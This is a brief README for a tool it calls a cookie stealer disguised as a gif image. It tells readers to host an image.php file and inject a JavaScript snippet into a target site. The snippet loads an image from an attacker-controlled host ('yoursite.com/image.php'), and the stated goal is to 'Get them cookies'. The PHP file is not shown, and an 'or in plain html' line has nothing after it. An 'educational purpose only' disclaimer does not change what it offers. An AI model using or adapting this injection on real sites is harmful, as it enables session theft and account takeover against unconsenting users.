A cookie stealer disguised as a gif image.
Host the image.php file wherever you want.
Inject the code on the target
let img = new Image(); img.src = "http://yoursite.com/image.php"; document.body.appendChild(img);
or in plain html
Get them cookies.
I'm not responsible for your actions. The code provided here is for educational purpose only. If you find a web site with code injection vulnerability, inform them.
I wrote this script some time ago, after watching this video: